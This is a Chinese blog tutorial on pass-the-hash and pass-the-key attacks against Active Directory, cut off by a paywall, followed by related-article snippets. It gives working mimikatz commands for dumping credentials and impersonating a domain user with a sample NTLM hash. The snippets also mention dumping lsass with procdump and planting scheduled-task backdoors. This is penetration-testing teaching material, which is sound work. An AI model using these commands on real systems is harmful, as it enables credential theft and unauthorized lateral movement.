AD域渗透 | PTH&PTK哈希传递攻击手法

最新推荐文章于 2024-06-05 14:04:34 发布
最新推荐文章于 2024-06-05 14:04:34 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: AD域 文章标签: windows python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57221101/article/details/124152949
版权

AD域渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。

发生情况

在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录

原理

由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚本来进行验证,使用密码和使用hash是没有本质区别的;同时需要注意一个问题,上面提到的hash时密码经过RC4方式计算出来的,而在一些域中不支持RC4,使用AES key(使用sekurlsa:ekeys导出key),这时候进行攻击的时候就可以通过传递key来实现目的(Pass the Key)

补丁问题

kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令,但是这个补丁不知道为什么漏了一个默认(user SID=500)本地管理员账户

因此防御PTH攻击的手段就是,打补丁,禁用500账号

攻击手段

mimikatz

PTH

0.依旧不浪费过多时间介绍如何获得hash,此处获得密码的操作在域控上实现

1.获取用户hash

privilege::debug

sekurlsa::logonpasswords

2.使用pth模拟登录

sekurlsa::pth /user:de1ay /domain:de1ay.com /ntlm:161cff084477fe596a5db81874498a24

之后会在原机器上谈一个cmd会话,因此这种方法需要有操作机

最低0.47元/天 解锁文章
彤彤学安全
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网安全(四)---横向渗透PTH&PTK&PTT
qi_SJQ_的博客
02-11 4226
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
AD渗透测试笔记
渗透测试研究中心
12-16 5061
0X00渗透-Kerberos 1.Kerberos简介 在Kerberos认证中,最主要的问题是如何证明“你是你”的问题,如当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是Kerberos解决的问题。在渗透过程中Kerberos协议的攻防也是很重要的存在。 2.Kerberos协议框架 在Kerberos协议中主要是有三个角色的存在: 访问服..
AD渗透链和工具推荐
最新发布
2301_76786857的博客
06-05 274
AD渗透链和工具
[内网渗透]—外向内信息收集、密码喷洒
Sentiment的博客
12-16 1385
当我们与目标内网建立了socks5隧道后,就可以从外对内机器进行信息搜集了,很多工具不用上传到目标机器,也就不易被AV检测到,但是有可能会被一些流量检测设备发现有大量socks5流量。接下来介绍下如何通过外对内进⾏更深的信息搜集:枚举⽤户、查看内⽤户、查看内组、查看内机器列表…LDAP(轻量⽬录访问协议),是⼀种⽤来查询与更新 Active Directory 的⽬录服务通信协议。AD 服务利⽤ LDAP 命名路径(LDAP naming path)来表示对象在 AD 内的位置,以便⽤它来
内网安全 - 横向 PTH&PTK&PTT
acepanhuan的博客
03-16 379
内网安全 - 横向 PTH&PTK&PTT
内网渗透-横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1731
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
环境PTH(pass-the-hash) HASH 传递
Longwaer
01-19 1510
学习了解环境中PTH的原理及利用方式,更快的掌握环境。
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,横向PTHPTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序...
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递(Pass-the-Hash,PTH)是一种网络安全攻击手段,攻击者在获取了目标系统的NTLM哈希后,可以不需知道原始密码就能在该网络内其他系统上进行身份验证,从而控制系统。这种攻击方式对Windows环境尤其具有威胁...
哈希传递到命名管道以进行令牌模拟-.NET开发
05-27
该项目是一个C#工具,用于在用户命名模拟的本地命名管道上使用哈希传递进行身份验证。 有一个博客文章进行解释:SharpNamedPipePTH此项目是一个C#工具,用于在本地命名管道上使用哈希传递进行身份验证,以进行用户...
GFPGANv1.4.pth
04-30
GFPGANv1.4.pth下载
红队技巧-渗透的协议利用
Gamma_lab的博客
06-29 2372
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
内网渗透PTH(pass-the-hash)
https://www.cnblogs.com/zpchcbd/
09-11 1664
pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为...
内网安全-横向PTH&PTK&PTT哈希票据传递
xhscxj的博客
03-14 1082
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 案例 1-横向移动 PTH 传递-mimikatz PTH ntlm 传递 未打补丁下的工作组及连接: sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.
Windows Server2008 R2搭建AD(Active Directory)控制器
旷野亮光
11-14 5039
目录 前言 1、配置环境 2、实验环境 3、安装活动目录,搭建环境 4、安装后的操作 5、将计算机加入 前言 在计算机系统中有两种计算机组织方式,分别是工作组和的方式;局网上的资源需要管理,“”和“工作组”就是两种不同的网络资源管理模式。那么二者有何区别呢? 工作组(Work Group): 工作组实行的是分散的管理模式,每一台计算机都是独立的个体。用户账户和权限信息...
初级AD渗透系列
weixin_34258782的博客
07-06 285
net group /domain 获得所有用户组列表 net group “domain admins” /domain 获得管理员列表 net group “enterprise admins” /domain 获得企业管理员列表 net localgroup administrators /domain 获取内置administrators组用户,这个组内成...
Active Directory渗透之白银票证后门
weixin_33827590的博客
09-19 251
本文讲的是Active Directory渗透之白银票证后门,本文的内容描述了一种方法,通过该方法,攻击者可以在拿到管理级别的权限约5分钟后,就可持久的对Active Directory的管理进行访问。 这篇文章将探讨攻击者如何利用计算机帐户凭据来持久的访问和控制企业内网,以及企业如何缓解这类潜在的安全问题。 计算机帐号 加入Active Dire...
ad安全-横向渗透
老北京砸酱锤的博客
10-18 2486
at/schtasks(计划任务) 在使用at/schtasks的前提是我们已经获得了内某本机权限,操作如下: 在控制的主机上使用mimikatz或Nishang获取明文密码或者hash当作密码字典→将信息搜集到的内用户作为用户名进行爆破→连接成功→通过at/schtasks计划任务植入后门等相关控制操作。 连接时我们使用IPC(Internet Process Connection)是共享“命名管道”的资管,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相关的权限,在远程管路
pth.ptt,ptk是什么
05-30
pth.ptt和ptk都是Windows系统中用于进行NTLM Hash转储攻击的工具。NTLM Hash是Windows系统中用于进行身份验证的一种方式,攻击者可以使用工具获取用户的NTLM Hash值,然后通过破解获取明文密码或者利用哈希转储攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值